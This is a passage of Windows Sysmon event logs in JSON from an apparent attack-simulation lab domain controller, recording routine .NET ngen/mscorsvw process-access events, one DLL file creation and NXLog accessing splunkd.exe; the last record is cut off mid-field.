{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8073,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:27.466\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1347-5F25-0000-001071CF0D00}\r\nTargetProcessId: 4764\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:27.466","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1347-5F25-0000-001071CF0D00}","TargetProcessId":"4764","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8074,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:27.466\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1347-5F25-0000-001071CF0D00}\r\nTargetProcessId: 4764\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:27.466","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1347-5F25-0000-001071CF0D00}","TargetProcessId":"4764","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8075,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:27.482\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1347-5F25-0000-001071CF0D00}\r\nTargetProcessId: 4764\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:27.482","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1347-5F25-0000-001071CF0D00}","TargetProcessId":"4764","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8076,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:27.513\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1347-5F25-0000-0010D9D20D00}\r\nTargetProcessId: 3356\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:27.513","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1347-5F25-0000-0010D9D20D00}","TargetProcessId":"3356","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8077,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:27.513\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1347-5F25-0000-0010D9D20D00}\r\nTargetProcessId: 3356\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:27.513","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1347-5F25-0000-0010D9D20D00}","TargetProcessId":"3356","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8078,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:27.529\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1347-5F25-0000-0010D9D20D00}\r\nTargetProcessId: 3356\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:27.529","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1347-5F25-0000-0010D9D20D00}","TargetProcessId":"3356","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8079,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:27.622\r\nProcessGuid: {E2A3D6B1-1347-5F25-0000-0010D9D20D00}\r\nProcessId: 3356\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d1c-0\\SMDiagnostics.dll\r\nCreationUtcTime: 2020-08-01 07:01:27.622","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:27.622","ProcessGuid":"{E2A3D6B1-1347-5F25-0000-0010D9D20D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\d1c-0\\SMDiagnostics.dll","CreationUtcTime":"2020-08-01 07:01:27.622","EventReceivedTime":"2020-08-01 07:01:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8080,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:27.638\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:27.638","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8081,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:27.654\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1347-5F25-0000-0010FAD70D00}\r\nTargetProcessId: 4844\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 